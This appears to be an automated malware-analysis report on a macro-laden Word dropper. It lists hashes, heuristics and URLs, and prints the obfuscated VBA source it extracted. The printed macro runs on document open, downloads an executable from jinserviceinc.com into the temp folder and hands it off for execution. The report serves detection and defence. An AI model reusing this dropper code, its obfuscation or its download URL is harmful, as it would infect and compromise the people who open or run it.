Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7f39d03c88df1f71…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 114.2 KB
Created: 2018-10-23 12:29:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-11-20
MD5: 34680dc9ee0ebf2236f6d4f4ea40bf11
SHA-1: 7d14fac76d5fed2ef647ff6643b4f37e3b652018
SHA-256: 7f39d03c88df1f7190a20b65d68e5eedfb42722491b22ad8746f7457e08d6f25
Risk score: 308

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample is an Office document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from a URL and saves it to disk, which is then likely executed. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic further suggests an auto-execution mechanism via XMLHTTP. The presence of a 'Document_Open' macro and the 'OLE_VBA_SHELL' firing confirm the intent to execute code upon opening the document, likely leading to the download and execution of a second-stage payload.

Heuristics (11)

  • ClamAV: Doc.Dropper.Agent-7144196-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-7144196-0
  • VBA project inside OOXML (medium, 7 related findings, OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
    Shell bafGXRwJxsNM6HAd
  • VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    DcPpzZFIKYQ4kg.Write WSiKV4zpePnv6csAY.responseBody
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    Set DcPpzZFIKYQ4kg = CreateObject("adodb.stream")
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Workbook_Open macro (the matched line starts with an apostrophe, i.e. it is commented out in the extracted source, so this is a keyword match rather than a live auto-exec entry point)
    Matched line in script
    'Sub Workbook_Open()
  • Environ() call, env variable access (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
    path = Environ("temp") & "\42737.exe"
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://jinserviceinc.com/system32.exe (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
    • http://ns.adobe.com/xap/1.0/ (referenced by macro)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (referenced by macro)
    • http://purl.org/dc/elements/1.1/ (referenced by macro)
    • http://ns.adobe.com/xap/1.0/mm/ (referenced by macro)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (referenced by macro)
    • http://ns.adobe.com/photoshop/1.0/ (referenced by macro)
    • http://ns.adobe.com/tiff/1.0/ (referenced by macro)
    • http://ns.adobe.com/exif/1.0/ (referenced by macro)
    • http://www.iec.ch (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 17727 bytes
SHA-256: 81b50ebd499fe4a541fee8ecff138a928cd4ec71152234cba99da0363751f599
Detection
ClamAV: No threats found
Obfuscation or payload: likely
363 of 488 identifiers look randomly generated (e.g. 'WSiKV4zpePnv6csAY') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim FC3RXuNVO4GgZ62W
FC3RXuNVO4GgZ62W = 29
While FC3RXuNVO4GgZ62W <= 841
FC3RXuNVO4GgZ62W = FC3RXuNVO4GgZ62W + 25
Wend
LPOHBZ0en = "NyzEqoDxIdFag43K"
LTHBxPAyQ9VlFkz2g = G72bo8CdZGtsUIO & FC3RXuNVO4GgZ62W
Dim z0w2Qp9tn
z0w2Qp9tn = 29
While z0w2Qp9tn <= 841
z0w2Qp9tn = z0w2Qp9tn + 25
Wend
lS7HcDzGe = 2186
T48EYlL3nCbr = wjWnB8XZ5L0KUSFa & z0w2Qp9tn
Dim KWy5L14CG
KWy5L14CG = 249
While KWy5L14CG < 789
KWy5L14CG = KWy5L14CG + 4
Wend
tr5BAYMlJp = "VuRLpV6MnFHg71Qwz"
hOygPV3QXUNiB = oPNXAcdpTfxRa2h & KWy5L14CG
main
End Sub
Sub Document_Close()
Dim fdI1OcMhBV
fdI1OcMhBV = 146
While fdI1OcMhBV <= 287
fdI1OcMhBV = fdI1OcMhBV + 21
Wend
j5CZEdNWGvR7DcSVK = "pXfCTKcxIWBu6"
vFq8V5Wx7AZlKXoP = QbvK4cZl2ps & fdI1OcMhBV
If 11 < 169 Then
' yJFfpSOw2oXC80
Else
' kiKmz3LOPTw90M5cr
Debug.Print "fIBom4Oxqp"
End If
End Sub

Attribute VB_Name = "VhYSUyDiqlmnWV"
'Sub Workbook_Open()
Sub main()
If 27 < 169 Then
' BGWqtxJmF
Else
' ZuZbzxcodA3ljITv
MsgBox "QKYrN0JxF"
End If
Dim phsntjeG0
phsntjeG0 = 108
While phsntjeG0 < 456
phsntjeG0 = phsntjeG0 + 16
Wend
iW617XczFfCy = 36447
wxjF8JHZtS = E2TUVe6oPh & phsntjeG0
If 26 < 217 Then
' V3nAHwxsFOP
Else
' bSAiveuLbPc
Debug.Print "E69dQtnzDROVPBa"
End If
Dim W7xp2qPosy
W7xp2qPosy = 127
While W7xp2qPosy <= 653
W7xp2qPosy = W7xp2qPosy + 56
Wend
dnZHsxXlTRyV2N = 19773
DPwsImpjCrfqB9Xh = url8mhBNp7sXgGTWO & W7xp2qPosy
If 32 < 241 Then
' t1v8LmWQeVn32b
Else
' TuiRV0v9cS
Debug.Print "LcrmA95oQV0jg"
End If
Dim G1WMlwrDzToVRE
G1WMlwrDzToVRE = 7
While G1WMlwrDzToVRE < 333
G1WMlwrDzToVRE = G1WMlwrDzToVRE + 11
Wend
AhcZK6f75 = "Wg4kcA8wN"
O7TBpkGP2yC = ubiWcS6Vrl & G1WMlwrDzToVRE
If 14 < 245 Then
' upbgPc87t4
Else
' eazus28A5
Debug.Print "pH279mMiTNWsZw1"
End If
If 918 - 13 = -1329 + 1343 Then
pcMB3g4dEkfPCwrR = "BaiuHbJ5NQWGeI"
End If
l6kije5nRHZ = "iEeGLZKIo"
sDyzv23Jx1lkPHqh5 = pcMB3g4dEkfPCwrR & l6kije5nRHZ
Dim HxL2ANm4If
HxL2ANm4If = 229
While HxL2ANm4If <= 1022
HxL2ANm4If = HxL2ANm4If + 2
Wend
dH86ESmGAgD10d2i = 39066
nutwfnqoFN6KW0UrS = y4YHv7By9kZLrN & HxL2ANm4If
If 46 < 147 Then
' AFOrCV7YBgck
Else
' m7mZlSiVRJsCF4
MsgBox "WI1L9sOthF6Nnm"
End If
Dim YHOgCw7vzq26ZSVaG
YHOgCw7vzq26ZSVaG = 147
While YHOgCw7vzq26ZSVaG <= 642
YHOgCw7vzq26ZSVaG = YHOgCw7vzq26ZSVaG + 40
Wend
zstvC5mWDUloG8Fd6 = "Uylgf5G6bnI2U"
N2mXEAyfKCQtp7kcd = fv0AHJ4zF1f & YHOgCw7vzq26ZSVaG
If -93 + 142 = 3468 - 3461 Then
EvPQUbW0ea5f1N9I = "GRPaJtirk1LGdfWvY"
End If
kkKwJaXWI = "vzKOA0C8RJvBcfXV"
qkAXzu6aCFPWE3rfq = EvPQUbW0ea5f1N9I & kkKwJaXWI
If 1011 + 11 = -1534 + 1541 Then
EWJzAvNwKHmcO = "onWuVDs5ydbz76"
End If
aJb2DewpNnUaMGLC = 3554
nztuh9GWM7L = EWJzAvNwKHmcO & aJb2DewpNnUaMGLC
Dim kV8gpihSzK
kV8gpihSzK = 228
While kV8gpihSzK <= 596
kV8gpihSzK = kV8gpihSzK + 33
Wend
S2xcHangwyGRC = "z71QzJAR9oawcHde"
peZ27uIdrCVQ9ELoj = uF2ESxpsniPIvQ & kV8gpihSzK
Dim qXB2EwNF4sc0K
qXB2EwNF4sc0K = 125
While qXB2EwNF4sc0K <= 752
qXB2EwNF4sc0K = qXB2EwNF4sc0K + 3
Wend
tPU5cXkroE = 1710
F1x5fNqU0riG = GGWMZiCfS & qXB2EwNF4sc0K
If 28670 / 610 = 32450 / 2950 Then
ItShkrec78 = "J58egIbO3JylXDr"
End If
nPBDVWOGsfey = 17288
qB5qNDnZPrVlW = ItShkrec78 & nPBDVWOGsfey
Dim jdfbghm2QP
jdfbghm2QP = 149
While jdfbghm2QP < 441
jdfbghm2QP = jdfbghm2QP + 28
Wend
jUnrlIXobGdgqis = "hzoRJy13bHxKlpOD"
Se1DUWPjxOA8lQE = EyvQoDdEV57jg & jdfbghm2QP
If 85 + 43 = -2387 + 2399 Then
v2IhQpXauGZxm7 = "meE8LtFvSCnrm"
End If
RqHl167fGtBIuT = "C85dOkTE0w"
UEz4oXwJsFALjVf = v2IhQpXauGZxm7 & RqHl167fGtBIuT
If 23 < 226 Then
' Csj0INVtP38uibpn
Else
' SU9lOKmfvqZJRizs6
Debug.Print "Not90TWV71"
End If
If 19700 / 25 = -16216 + 16218 Then
XWCBP6uI1UDn9 = "ApvculZm8eL5h2FxA"
End If
KgsHVb6TG = 9824
eqdAJ26Esnvl8B = XWCBP6uI1UDn9 & KgsHVb6TG
Dim wwD74RQsHe3O
wwD74RQsHe3O = 26
While wwD74RQsHe3O <= 557
wwD74RQsHe3O = wwD74RQsHe3O + 1
Wend
GqP6Z3lsSbd7I = 1386
u3srXNDvCKF = jvKR59Z3hyGUtc & wwD74RQsHe3O
Dim iCPQ5gXBpFv
iCPQ5gXBpFv = 26
While iCPQ5gXBpFv <= 557
iCPQ5gXBpFv = iCPQ5gXBpFv + 1
Wend
d4me3Agcdq2sBiCUL = 1386
LTXR3CVo4vPq9IaMn = i60K1UBme4 & iCPQ5gXBpFv
If 8 < 209 Then
' ZLSPZ47tpDuwFN
Else
' v6OVRvFYteHB41T
MsgBox "lQRCGxDoJU2ce"
End If
If 26 < 202 Then
' KYTrZP3ab
Else
' nsxlSiDtCr0gMcZ
MsgBox "pmAST3Y8GHsWN"
End If
If 26 < 202 Then
' bTAB0RDxzZ2
Else
' A26JjRmv8qPrZpxW
MsgBox "tnELY3Zx8J"
End If
Dim a3VM5CfIPpUwbgxLm
a3VM5CfIPpUwbgxLm = 84
While a3VM5CfIPpUwbgxLm <= 741
a3VM5CfIPpUwbgxLm = a3VM5CfIPpUwbgxLm + 55
Wend
BN47EMFzh = "IXqN5TAkPtI1UlV"
g0LM7sVESxG = uwnBXHGfckYxP7I & a3VM5CfIPpUwbgxLm
Dim SGOSJerBbWx41PItY
SGOSJerBbWx41PItY = 84
While SGOSJerBbWx41PItY < 741
SGOSJerBbWx41PItY = SGOSJerBbWx41PItY + 55
Wend
ohwCtWXa2xVTvqA0 = 32843
w71QkKmJ0p6ECDSP = lG3Vjue5Zhpb & SGOSJerBbWx41PItY
Dim XFCMY3oyQKJmrpck
XFCMY3oyQKJmrpck = 127
While XFCMY3oyQKJmrpck <= 864
XFCMY3oyQKJmrpck = XFCMY3oyQKJmrpck + 15
Wend
sFV7G26qQUh = 23404
z24di1KEDAsm = l7ie9EOrLKFwC & XFCMY3oyQKJmrpck
Dim sG9xjUtmybHBrsLVR
sG9xjUtmybHBrsLVR = 127
While sG9xjUtmybHBrsLVR < 864
sG9xjUtmybHBrsLVR = sG9xjUtmybHBrsLVR + 15
Wend
HZSf8lX5n9B = "moku0JdyZCn2Ppl"
XnVIEwWKB5m8ik3 = hWH5JpFcwt & sG9xjUtmybHBrsLVR
If 41 < 240 Then
' PNoQEHecqy
Else
' Vz5R0cPynG
MsgBox "zw873YziNFgPQtMW2"
End If
If 40 < 142 Then
' Y9bjgvpynlAG
Else
' gv2pcsRh5OxVH1r
MsgBox "b4qemCdfVGjE"
End If
If 458 + 54 = -11057 + 11058 Then
o7K5FRlvD = "jszEI6dn7uBV2KT"
End If
bWsIciDewyQx2E4J = 28383
NPZ3boiCgu = o7K5FRlvD & bWsIciDewyQx2E4J
If 13 < 172 Then
' ZvPxJ0SV38yzXmB
Else
' rpewnDkCS28y
MsgBox "DJdeN60xYLIEoFRk"
End If
If 464 + 34 = 20808 / 2601 Then
kXhbM1xCDfdAqeE7N = "PCe6TQB5t"
End If
AsNMCjwFf = "s5Eiby8Bjutep43Ic"
RQW1jZfP6qc = kXhbM1xCDfdAqeE7N & AsNMCjwFf
If 36 < 236 Then
' IMYZg0LchieDJ3o
Else
' pa9gPr2s0iq5QtEf6
MsgBox "ntCdLysre6PjXJqx"
End If
If 36 < 213 Then
' HYTGDNfrweu
Else
' FV4DndQG18uv3WjwL
Debug.Print "rG5i1mVaP2FuEDN"
End If
If 36 < 213 Then
' s5PCrzeFg
Else
' WIeKrOW68SQaoPux9
MsgBox "o3mP2Tz9ftRsDE"
End If
If 436 + 30 = -9215 + 9217 Then
EW7cHfZQh184aY = "oGDQN34lsXj"
End If
kNiK1nut0 = 12739
SWxTwCG2Zd7RkMPh = EW7cHfZQh184aY & kNiK1nut0
Dim JrMJ5d1oBe6XgS
JrMJ5d1oBe6XgS = 72
While JrMJ5d1oBe6XgS <= 1016
JrMJ5d1oBe6XgS = JrMJ5d1oBe6XgS + 59
Wend
yM0Z4Jnk1ED6s = "cBa8zqriw6ZtlX"
QS0GcqLBC8m = jmI1bLBc2pRTHth & JrMJ5d1oBe6XgS
If 41 < 224 Then
' Xsb94KN60jyYr
Else
' vKhtL48XsTARm
Debug.Print "tnW5mx6zOsVo0"
End If
Dim wXAvi64aPLdsl
wXAvi64aPLdsl = 203
While wXAvi64aPLdsl <= 298
wXAvi64aPLdsl = wXAvi64aPLdsl + 9
Wend
xfGxYV8uqjsMoLd4W = 32765
pgDYXHldy8AEvn = cjIv4JB8NSm1th & wXAvi64aPLdsl
If 453 - 36 = 2240 - 2227 Then
FmoyW31qSIc = "I6nwgY0S1WEZxGaDX"
End If
LTtMGPAiN8cBm = "tjTFMhXy4lU3"
g3nrt6VkvFzW = FmoyW31qSIc & LTtMGPAiN8cBm
If 11 < 143 Then
' cbdfVSBPeLNaHW
Else
' BW5AGLmHs9F
MsgBox "GNwg8lIncBYXV"
End If
If 40 < 134 Then
' RruikFpdBGbZ
Else
' aPNspnGium
MsgBox "vk6K9BhNnY4ZML"
End If
If 40 < 134 Then
' QCSBbcQPswU8glj
Else
' ePYO9qjBX
Debug.Print "bqx6aiTUejf4Mnd"
End If
Dim IVyBjOzfE7Xr0el
IVyBjOzfE7Xr0el = 3
While IVyBjOzfE7Xr0el <= 328
IVyBjOzfE7Xr0el = IVyBjOzfE7Xr0el + 21
Wend
osTLvRKFzp = 38778
xHln5uRjwPsAJth2 = M7fPz6ti0y4 & IVyBjOzfE7Xr0el
If 31824 / 51 = -724 + 736 Then
yyDSb3dxZeqcmHkJ = "FWDtZQLc41mJ6lApB"
End If
akJ13YpBH = 38778
YoGlTQXqnODuL1 = yyDSb3dxZeqcmHkJ & akJ13YpBH
If 294 - 136 = -4803 + 4809 Then
y8vK2HrtMj0zyW = "T0jKhSCvJ4y7MN6YR"
End If
zN36FIHrSkOYas = 8960
J85mRDN6nZlPgS = y8vK2HrtMj0zyW & zN36FIHrSkOYas
If 294 - 136 = -4803 + 4809 Then
aGNXkSnUMdjPL7YW = "LE7woN1d4tOXT8"
End If
e36BYgbci = "KsR0uGJN934kOVYxP"
KiAFrc5mXy = aGNXkSnUMdjPL7YW & e36BYgbci
If 12 < 170 Then
' YotAH0R6h
Else
' C56zbw49W
MsgBox "llcpYZmyFa1zwNG"
End If
If 12 < 170 Then
' oWKFJR2LspE9BN
Else
' qkJwcqFo2I0tx1
MsgBox "lbMT9oqO7CArt"
End If
If 550 - 500 = -336 + 351 Then
ru5HjMoLk4 = "zzaRmnFVo3p4wgGY"
End If
l9rVugDOLBq = 28119
hxyEi8p6c = ru5HjMoLk4 & l9rVugDOLBq
Dim GqFVMmrn6Ui
GqFVMmrn6Ui = 154
While GqFVMmrn6Ui < 612
GqFVMmrn6Ui = GqFVMmrn6Ui + 25
Wend
Gf7JYWlwoEhG = 28119
uI3ChiJY9HS6VW = h9OsPHVmQ4zx & GqFVMmrn6Ui
Dim PqmTHLrIYN5czb
PqmTHLrIYN5czb = 255
While PqmTHLrIYN5czb <= 622
PqmTHLrIYN5czb = PqmTHLrIYN5czb + 45
Wend
qux8FA3cQKMe = "UbDjMPQaekoBZhv0"
ac1SMK0eDdqNzWbIO = qqHteoKYv2CrD & PqmTHLrIYN5czb
If 15720 / 20 = -7517 + 7520 Then
OZoOp1hnM = "rr4iON6xyPK0uh"
End If
grGcxA04koQ = 28530
ZemvHo2R5kC7dOa1S = OZoOp1hnM & grGcxA04koQ
Dim efeNVgzqMkXObH
efeNVgzqMkXObH = 129
While efeNVgzqMkXObH < 838
efeNVgzqMkXObH = efeNVgzqMkXObH + 11
Wend
OsTx14RliZw9U = "grIynTV8vZho2HL"
j1vDh2Coe = deKu6MfDc5 & efeNVgzqMkXObH
If 407 - 72 = 28301 / 4043 Then
PznjyPIp2aBmNR = "PiukVPER9T0N6Ia"
End If
Xv0wFpu3EL = "pZbDCwae9U"
FODkhxU1H4PX = PznjyPIp2aBmNR & Xv0wFpu3EL
If 24 < 215 Then
' NRgP37a1X2vU
Else
' afaGuyPWRr5cT1
MsgBox "Z7wtaEqfUAczenjWg"
End If
If 63 < 219 Then
' cXl8NqGWe4oPY
Else
' ovBkYp1cdW
MsgBox "hzbyOkNLVq26IvPf"
End If
If 63 < 219 Then
' J0JLvaEkV
Else
' e7OYifI21adq
Debug.Print "iDRLuG79XOgtkj"
End If
Dim J46zy13sjirGuUw
J46zy13sjirGuUw = 216
While J46zy13sjirGuUw < 754
J46zy13sjirGuUw = J46zy13sjirGuUw + 8
Wend
JgckW85oUAnrRP = 41104
D5V9y7NdeUbX = n31JuaRKZHtox & J46zy13sjirGuUw
If 15040 / 470 = 2030 / 145 Then
RiAhscIOW5QnrGxL = "mjsRgXxbJnLFzYW"
End If
aprFqGnWEzRtQMT = 41104
FMiud7tXOK = RiAhscIOW5QnrGxL & aprFqGnWEzRtQMT
If 53 < 147 Then
' dNyMLmsRc9
Else
' hL2XxZS1V80rwTAK4
MsgBox "uoclEjKZUh"
End If
If 672 + 13 = 21966 / 3661 Then
rutfHshn8XE1 = "EEOUSWbqPi3h72ZvF"
End If
kmR6I4GVNxPB1 = 36725
Nkb1GQyRefiYa = rutfHshn8XE1 & kmR6I4GVNxPB1
If 1027 - 29 = -117 + 128 Then
y7A2Wu9cOCaRiMBX4 = "Yr4Tvdp3RmGJWjXk"
End If
eys78Cqo4uj0Z = "ovTA2Uxjchbidgf"
CNTDUd0jp = y7A2Wu9cOCaRiMBX4 & eys78Cqo4uj0Z
If 1027 - 29 = -117 + 128 Then
gdNU61GwIQPioyu = "fbi5Ur1QXzqa4Wp"
End If
lg5R67oHU2AqrpNb = 3559
MqKC8OhTxmdFrp = gdNU61GwIQPioyu & lg5R67oHU2AqrpNb
If 26520 / 51 = -230 + 236 Then
MkZvgL5RMnqdzlUp = "iOfbj6L1UcqMameiB"
End If
V4sXglSkzA = "lxoSvRyAMscqlp"
yZCb5j03MKshtULF = MkZvgL5RMnqdzlUp & V4sXglSkzA
If 47 < 200 Then
' BfnIXg03Q1CFSHJ5U
Else
' CS0MGApbt943aNlj
MsgBox "FhQITlK6mzt3B"
End If
Dim yREzQgBmMK5tv
yREzQgBmMK5tv = 229
While yREzQgBmMK5tv < 827
yREzQgBmMK5tv = yREzQgBmMK5tv + 48
Wend
J5Ex9QhwIFUJ = 58198
KQgnqAmfhix3IK79k = zoUc9kSZQKtP & yREzQgBmMK5tv
path = Environ("temp") & "\42737.exe"
MjupZH5vW1eOo "http://jinserviceinc.com/system32.exe", path
If 39 < 232 Then
' uEpROGBTK7xCv
Else
' VpQlS73Bj269
Debug.Print "XoN9SiMxT2gO"
End If
Dim Ww6zGSgPy As Object
Dim yHUlVyA31eIYd
yHUlVyA31eIYd = 255
While yHUlVyA31eIYd <= 482
yHUlVyA31eIYd = yHUlVyA31eIYd + 10
Wend
A7TIiUmbZVcYa = "yC6RKS3kVQcPvy"
v8AUFaq7P = c6GOU8Awmeh1W & yHUlVyA31eIYd
Dim de7qbEOgjwofnNy
de7qbEOgjwofnNy = 255
While de7qbEOgjwofnNy < 482
de7qbEOgjwofnNy = de7qbEOgjwofnNy + 10
Wend
Ufv7UGaotu2ORVE5D = 21175
dW8eQ90AqMEFN = C0oRnKOIhyFBz9D & de7qbEOgjwofnNy
If 458 + 9 = -1425 + 1440 Then
S5LGh8k9DIBKuAW1 = "oWzr4FJk9KdhbON"
End If
sg75oL8bn = 3830
eflBuVgJDpGHbKwaz = S5LGh8k9DIBKuAW1 & sg75oL8bn
If 458 + 9 = -1425 + 1440 Then
HQ0uftE1vAPSdc = "IMNkcEDzVn"
End If
ny6XfJIdml = 3830
jwNlzfhmeLUp0 = HQ0uftE1vAPSdc & ny6XfJIdml
Set Ww6zGSgPy = New frmMain
If 8550 / 9 = 30261 / 10087 Then
tPdN9uBUg5bv = "sj1X9DC0iR54cHfI"
End If
un1LFQc9D = 19695
P1Iq0SalH = tPdN9uBUg5bv & un1LFQc9D
Ww6zGSgPy.hello path
End Sub

Attribute VB_Name = "kjzGmo6Hcg0O2lkL"
Public Function MjupZH5vW1eOo(ByVal KEfViuzwDZjn$, ByVal b12OiWrMSUFkLR$)
    If 59 < 138 Then
' VBeGlsiSgEWDJCTK1
Else
' rU50zhDv9CiMjtEX
Debug.Print "F7cD3Au0xB"
End If
If 26 < 207 Then
' bx2TeJ79rKkcOPl8
Else
' O8AyWdlSwJEzZ
MsgBox "cnBN7xv4MwUGpFEh"
End If
If 403 - 78 = 21264 / 1329 Then
N2qFXxrWkhiJavtdb = "ZF4YAZ7vL1nHO"
End If
Ugz19vAQ0y = "mzBa5k6DjFo9"
fBL6x92ZswoGNvMdO = N2qFXxrWkhiJavtdb & Ugz19vAQ0y
Dim oDBgTkJvjz
oDBgTkJvjz = 83
While oDBgTkJvjz <= 536
oDBgTkJvjz = oDBgTkJvjz + 58
Wend
o5Ny0sCbUlAvtP3Lf = 17598
rjBOwEI7D8ba61Nn = QazRXQmfWgyLwx & oDBgTkJvjz
If 713 - 47 = 2236 - 2225 Then
LlwGD8tebUIKdBR = "Nkjh3ela6srqV8b4"
End If
sIbgZu3A6B = "mPqdMO7hSV2wIs"
gIoGDs4ryvUBN2Y = LlwGD8tebUIKdBR & sIbgZu3A6B
Dim tJ0kyvaUufK6w8mGR
tJ0kyvaUufK6w8mGR = 99
While tJ0kyvaUufK6w8mGR <= 450
tJ0kyvaUufK6w8mGR = tJ0kyvaUufK6w8mGR + 37
Wend
ikNdYZH8Di = 58473
KhrHgWVTAtjYeN4q = xDNt9BMncjolIWR87 & tJ0kyvaUufK6w8mGR
If 43 < 235 Then
' ypmhLXicQHbeo
Else
' Rg0Q6bKnlk
MsgBox "iia4tRJVgExF0"
End If
Dim EEzXoKdlP
EEzXoKdlP = 46
While EEzXoKdlP <= 796
EEzXoKdlP = EEzXoKdlP + 41
Wend
k5GX6nzNoZg8lKf = 41833
cQxtfpb93Fqk = N6pzhufwGivQIrSBa & EEzXoKdlP
If 52 < 194 Then
' T1i69qYAXS
Else
' vVpEZLMOxy
MsgBox "OKa3n5UBH21Ym"
End If
If 52 < 194 Then
' CXvy8FQosg1OKBS5R
Else
' w59JWA2wFYM
MsgBox "QA97Eq1sFOIP"
End If
If 854 - 32 = -4804 + 4807 Then
xR9ZwHVQhl = "SDwBycIg6mNST4Ont"
End If
I53IkwvurPVhCjGAf = 34556
LwoWdLUPzJ6DY = xR9ZwHVQhl & I53IkwvurPVhCjGAf
If 23 < 149 Then
' HPypMV2cI56
Else
' OLqVrfQ98X07b4
Debug.Print "Fd4z8yuXvqS9cWs2j"
End If
If 26 < 142 Then
' Uxt61LpZUhv
Else
' nJVZRabFsXmzpI
Debug.Print "tECG3YsofprAnS"
End If
Dim iftXxvKiw6BnJZVjb
iftXxvKiw6BnJZVjb = 24
While iftXxvKiw6BnJZVjb < 875
iftXxvKiw6BnJZVjb = iftXxvKiw6BnJZVjb + 17
Wend
aYu4Klv0GV = "DJoKTzlcO6iemL5X"
jbeFl3rWMiq5H = dnWe3f5q1YyDE & iftXxvKiw6BnJZVjb
If 42 < 172 Then
' KtnEcW37PU2G1zMyf
Else
' cgVhHYlNUDfKuP1
Debug.Print "gnKyJRkiS1d5wY6b9"
End If
Dim C92CBvg0iFSKOTc
C92CBvg0iFSKOTc = 178
While C92CBvg0iFSKOTc <= 409
C92CBvg0iFSKOTc = C92CBvg0iFSKOTc + 34
Wend
ZBHQZ4AU9MXVwc = "orJT9hoVP8HIuv"
ZK3orfiWeRYEkSbX = Vg5kpmceWfT6w4PQj & C92CBvg0iFSKOTc
Dim rFHyITakKxCQjrc6L
rFHyITakKxCQjrc6L = 116
While rFHyITakKxCQjrc6L <= 275
rFHyITakKxCQjrc6L = rFHyITakKxCQjrc6L + 45
Wend
rwyTYH1au = "aPrblFa8gHD"
CvZyI4sPCV = AdIOuDAS7eFyh4MLU & rFHyITakKxCQjrc6L
If 49 < 133 Then
' aCH40fSLEtFxY
Else
' h6la7LAQ3zEXI
Debug.Print "FCjLdTmPSzlJ6QY"
End If
Dim WSiKV4zpePnv6csAY As MSXML2.XMLHTTP60
Set WSiKV4zpePnv6csAY = New MSXML2.XMLHTTP60
WSiKV4zpePnv6csAY.Open "GET", KEfViuzwDZjn$, False
WSiKV4zpePnv6csAY.Send
If WSiKV4zpePnv6csAY.Status = 200 Then
If 16 * 14 = 1060 - 1044 Then
PObu9scx0MT = "bDJ83r1YkqahH"
End If
dmAcjRO43dfaYGQ = 61616
n67gA2BSIKisRXzJ = PObu9scx0MT & dmAcjRO43dfaYGQ
Dim JdXq9gTLkIx2tJcOB
JdXq9gTLkIx2tJcOB = 163
While JdXq9gTLkIx2tJcOB < 364
JdXq9gTLkIx2tJcOB = JdXq9gTLkIx2tJcOB + 58
Wend
Nhlcy5Ab7 = 14113
I5nwVeQFz1ObaoW = GUnvKpiM1F & JdXq9gTLkIx2tJcOB
Set DcPpzZFIKYQ4kg = CreateObject("adodb.stream")
If 53 < 147 Then
' k0KcLiCw4D
Else
' ZzrvCusLTiH
MsgBox "bQH5JceNrpWfuU"
End If
If 13380 / 15 = -772 + 785 Then
w9CVLYhbo2Q46 = "aGD648Y0ka"
End If
LurnFHBRETA6QN0xw = "CKuSIUTZH0A"
oqTkDWG6V = w9CVLYhbo2Q46 & LurnFHBRETA6QN0xw
Dim j7vDtZVuGFgzP
j7vDtZVuGFgzP = 103
While j7vDtZVuGFgzP <= 497
j7vDtZVuGFgzP = j7vDtZVuGFgzP + 48
Wend
